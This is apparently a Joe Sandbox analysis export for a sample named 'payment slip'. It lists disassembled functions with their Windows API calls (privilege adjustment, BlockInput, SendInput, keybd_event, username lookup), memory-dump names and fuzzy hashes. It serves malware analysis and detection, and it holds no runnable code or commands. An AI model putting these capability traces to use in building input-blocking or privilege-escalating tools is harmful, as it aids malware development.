                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CloseControlCreateDeviceFileHandle
                                        • String ID:
                                        • API String ID: 33631002-0
                                        • Opcode ID: 6d3997fd86226308f91f271c88dca766b152fa9591a2889ada6decd9ed3bf666
                                        • Instruction ID: a8a006425d87557a7d75a4a2ff5e50afaa248dd72c7bdbbe8c041dc9e8c1d5c2
                                        • Opcode Fuzzy Hash: 6d3997fd86226308f91f271c88dca766b152fa9591a2889ada6decd9ed3bf666
                                        • Instruction Fuzzy Hash: 22116175E45228BFEB208F95EC45FAFBFBCEB45B50F108116F908E7290D6704A059BA1
                                        Function 00091663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0009168C
                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 000916A1
                                        • FreeSid.ADVAPI32(?), ref: 000916B1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                        • String ID:
                                        • API String ID: 3429775523-0
                                        • Opcode ID: c92b5361dc3becb45ff0683b544fd7299ce43a702653277b92df8ddc0f218384
                                        • Instruction ID: eec54f05c84f5e6298d82c16d8878a7a6cfe457ff7e34ea699d073a1d3d1048c
                                        • Opcode Fuzzy Hash: c92b5361dc3becb45ff0683b544fd7299ce43a702653277b92df8ddc0f218384
                                        • Instruction Fuzzy Hash: 3BF0F471950309FBEF00DFE4DC89EAEBBBCFB08604F504565E901E2181E774AA449A54
                                        Function 00054CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(000628E9,?,00054CBE,000628E9,000F88B8,0000000C,00054E15,000628E9,00000002,00000000,?,000628E9), ref: 00054D09
                                        • TerminateProcess.KERNEL32(00000000,?,00054CBE,000628E9,000F88B8,0000000C,00054E15,000628E9,00000002,00000000,?,000628E9), ref: 00054D10
                                        • ExitProcess.KERNEL32 ref: 00054D22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: 1fc941d92123b3a37075d50c230464da014c0a8c26b3d41ecea88954f1ad127e
                                        • Instruction ID: 0606665a2986f318c4549e5d373c6b08165cf7829483aafcaea99607fbb75cef
                                        • Opcode Fuzzy Hash: 1fc941d92123b3a37075d50c230464da014c0a8c26b3d41ecea88954f1ad127e
                                        • Instruction Fuzzy Hash: 1EE0B631400148ABEF11AF54EE09E993B79FB41786B148018FC098B123CB3ADE86CAA0
                                        Function 0006C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: /
                                        • API String ID: 0-2043925204
                                        • Opcode ID: add8697db7c06a2cd6c33babc3753613f6c6e5acc55263e7c9fa8dff354b862b
                                        • Instruction ID: bfd01b7f2bca449616e409a8ec0adf1c508854170d2354882763d68330e99317
                                        • Opcode Fuzzy Hash: add8697db7c06a2cd6c33babc3753613f6c6e5acc55263e7c9fa8dff354b862b
                                        • Instruction Fuzzy Hash: D5413B725002196FEB20DFB9DC49DBB77BAEB84314F504269F945D7281E6709E41CB50
                                        Function 0008D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetUserNameW.ADVAPI32(?,?), ref: 0008D28C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: NameUser
                                        • String ID: X64
                                        • API String ID: 2645101109-893830106
                                        • Opcode ID: 3503a0894617159eb8ca37489b06c4552a4e24f3599cdb1f208f499b5c975ae9
                                        • Instruction ID: a7e09d8eb9178bf21b2e3c263573a7b02a93900d1eb6aa56d3618a50eada6a3e
                                        • Opcode Fuzzy Hash: 3503a0894617159eb8ca37489b06c4552a4e24f3599cdb1f208f499b5c975ae9
                                        • Instruction Fuzzy Hash: CDD0C9B480112DEADBA0DB90EC88DDDB37CBB14305F100252F506A2040D73495488F10
                                        Function 0005CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                        • Instruction ID: acfec07cbdde247042bf01b9522f1f61f615afaf793eadb54fb7eb13df56bbd6
                                        • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                        • Instruction Fuzzy Hash: 4C021C71E002199FEF14CFA9C884AAEBBF1EF48315F258169D819E7381D731AE45CB94
                                        Function 000A68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 000A6918
                                        • FindClose.KERNEL32(00000000), ref: 000A6961
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID:
                                        • API String ID: 2295610775-0
                                        • Opcode ID: 03e90ed50d0e252c912536acfeaf1a9cc2626f75e835c05b5667e60d0ad48d23
                                        • Instruction ID: f682372b6bbaed95cf3608389238dfcee0e15adb55e0069f415de9f463bac683
                                        • Opcode Fuzzy Hash: 03e90ed50d0e252c912536acfeaf1a9cc2626f75e835c05b5667e60d0ad48d23
                                        • Instruction Fuzzy Hash: 3F11D3356042009FD710CF69C484E16BBE4FF85328F08C6A9E4698F2A2CB31EC05CB90
                                        Function 000A37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,000B4891,?,?,00000035,?), ref: 000A37E4
                                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,000B4891,?,?,00000035,?), ref: 000A37F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorFormatLastMessage
                                        • String ID:
                                        • API String ID: 3479602957-0
                                        • Opcode ID: 5f1b0ef6f078c28cfe85da05bb118e42ca2091d9795c523c453787f1438556ca
                                        • Instruction ID: 30d707e595800fcb870e2b4b9eaef7015f65e8c3b8e67aa82bf182a9068ad687
                                        • Opcode Fuzzy Hash: 5f1b0ef6f078c28cfe85da05bb118e42ca2091d9795c523c453787f1438556ca
                                        • Instruction Fuzzy Hash: 00F0E5B16043282AF72057A69C4DFEF3AAEEFC5761F000175F509D22D1D9A09904C6B0
                                        Function 0009B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0009B25D
                                        • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 0009B270
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: InputSendkeybd_event
                                        • String ID:
                                        • API String ID: 3536248340-0
                                        • Opcode ID: 14a39df788aaf45cf0f93f773e7b55e605ef5b787d205c59d1ad57de1d67320d
                                        • Instruction ID: 58c7c151142fcbade6054568f2302e3c61d6002fb06dc13193f18b39192c8918
                                        • Opcode Fuzzy Hash: 14a39df788aaf45cf0f93f773e7b55e605ef5b787d205c59d1ad57de1d67320d
                                        • Instruction Fuzzy Hash: 01F01D7180424DABEF159FA0D805BAE7BB4FF04315F00801AF955A5191C77996119F94
                                        Function 000910BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                        Download Yara Rule
                                        APIs
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000911FC), ref: 000910D4
                                        • CloseHandle.KERNEL32(?,?,000911FC), ref: 000910E9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: AdjustCloseHandlePrivilegesToken
                                        • String ID:
                                        • API String ID: 81990902-0
                                        • Opcode ID: a954116f20bf461398f2e94ced398c6c380f695e87df05202b787e510d37043c
                                        • Instruction ID: 9726d31d16692d446cf91d00e164c386a7d9e8379784e045e86d961bd92d13ca
                                        • Opcode Fuzzy Hash: a954116f20bf461398f2e94ced398c6c380f695e87df05202b787e510d37043c
                                        • Instruction Fuzzy Hash: 23E0BF72014651AEF7252B51FC05EB777E9EB04311B24882DF5A6804B1DB626C90EB54
                                        Function 0003CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                                        Download Yara Rule
                                        Strings
                                        • Variable is not of type 'Object'., xrefs: 00080C40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Variable is not of type 'Object'.
                                        • API String ID: 0-1840281001
                                        • Opcode ID: 96b1462051a15fa28c1578b3c211f39818db0acbd30ba3a3e5359ef85bb1c509
                                        • Instruction ID: 276aa894707942c63ed27cb6aeb695aa7bd2cffabf56c056d04cf534c4843174
                                        • Opcode Fuzzy Hash: 96b1462051a15fa28c1578b3c211f39818db0acbd30ba3a3e5359ef85bb1c509
                                        • Instruction Fuzzy Hash: 8F32AC74900218DFEF65EF94C881EEDB7B9BF05304F148069E846BB292DB75AE49CB50
                                        Function 0006676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00066766,?,?,00000008,?,?,0006FEFE,00000000), ref: 00066998
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ExceptionRaise
                                        • String ID:
                                        • API String ID: 3997070919-0
                                        • Opcode ID: 2f660e55321369516054b507545ce22fa4fde5d0425191c53163b9b5a6e485e1
                                        • Instruction ID: 82c289e151f4f31c7b780caea2108a696b332f9d161759d20325bc0295797290
                                        • Opcode Fuzzy Hash: 2f660e55321369516054b507545ce22fa4fde5d0425191c53163b9b5a6e485e1
                                        • Instruction Fuzzy Hash: 14B14C31610608DFD755CF28C48AB697BE1FF45364F258658E89ACF2A2C736E991CB40
                                        Function 0004B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 1f874841e5436acde9b71a2e6863366e8b7b1d47a796d6ad9048817d4d19c87c
                                        • Instruction ID: e1f9390d9f25e16bc1eb94143f27fdd5d8c46aff02e9e554b92427adaf45ad9f
                                        • Opcode Fuzzy Hash: 1f874841e5436acde9b71a2e6863366e8b7b1d47a796d6ad9048817d4d19c87c
                                        • Instruction Fuzzy Hash: 6C1250B19002299FDB64DF58C8806EEB7F5FF48710F5481AAE849EB251DB349E81CF94
                                        Function 000AEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • BlockInput.USER32(00000001), ref: 000AEABD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: BlockInput
                                        • String ID:
                                        • API String ID: 3456056419-0
                                        • Opcode ID: 9624cc6a3bf2c10bb3f3b75c9d9f8a3b9e779d286259128dd6df33dfb30ecf40
                                        • Instruction ID: 0ede50adcfaecb5d9411b9ddadb8ff3bf4716b660c8580446f5e0bf718de675e
                                        • Opcode Fuzzy Hash: 9624cc6a3bf2c10bb3f3b75c9d9f8a3b9e779d286259128dd6df33dfb30ecf40
                                        • Instruction Fuzzy Hash: 70E01A362002049FD710EF99D804E9AB7EDAFA9760F00842AFD49DB351DA70AC408B91
                                        Function 000509D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,000503EE), ref: 000509DA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: fb97effb855a83746ac8e1a1aa04d6f4de5dc421fbf1dc03a812e7e976a8aa2f
                                        • Instruction ID: 30439418e2658f28c5aae0a513585a5a54712a62a67685fcbd5bb606e5e02e31
                                        • Opcode Fuzzy Hash: fb97effb855a83746ac8e1a1aa04d6f4de5dc421fbf1dc03a812e7e976a8aa2f
                                        • Instruction Fuzzy Hash:
                                        Function 0005781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0
                                        • API String ID: 0-4108050209
                                        • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                        • Instruction ID: 9760d05a73ce98cd3e9533e2b73cc5d80217305d5b8fd789aca9d296cb7a17de
                                        • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                        • Instruction Fuzzy Hash: 7751477168C6055ADFB88568A85D7FF63C9DB52302F180509DC8ED7282CE16EE0DF362
                                        Function 00066DD9 Relevance: .6, Instructions: 637COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9099be6a198f3f4df7aff0aa3588b65dce2bdbcc8c3a83f2c4a4f3a3d1e5810d
                                        • Instruction ID: 2d8f93fdac0a7e798ccf80a6027b4fe8ccfa2aa728c4295cdb1e0be65b5a4207
                                        • Opcode Fuzzy Hash: 9099be6a198f3f4df7aff0aa3588b65dce2bdbcc8c3a83f2c4a4f3a3d1e5810d
                                        • Instruction Fuzzy Hash: 9E32F222D2AF414DE7239634DC22335A78AAFB73D9F15D737EC1AB59A5EB29C4834100
                                        Function 0004CC39 Relevance: .6, Instructions: 635COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2b0384053f77cc998cf2ccd2f8651f50bc871a96fb2fd63e9d3781aaaa08101d
                                        • Instruction ID: ff493c746c60c608e6bd2add35e8e3227f13083571656b4574ca26703f00cfd7
                                        • Opcode Fuzzy Hash: 2b0384053f77cc998cf2ccd2f8651f50bc871a96fb2fd63e9d3781aaaa08101d
                                        • Instruction Fuzzy Hash: 0E321171A002558BFFB8EA28C4D4EBC7BF1FB45314F28817AD5CA8B691D2309D81DB61
                                        Function 00037920 Relevance: .6, Instructions: 563COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d54c2edf380088f96e509db7744debb9079f89df44bc961c4208731222dae65c
                                        • Instruction ID: 103e852e209d199b3090ec3182ee546c74fa52a62be9e9cefdb5be0dbb0de696
                                        • Opcode Fuzzy Hash: d54c2edf380088f96e509db7744debb9079f89df44bc961c4208731222dae65c
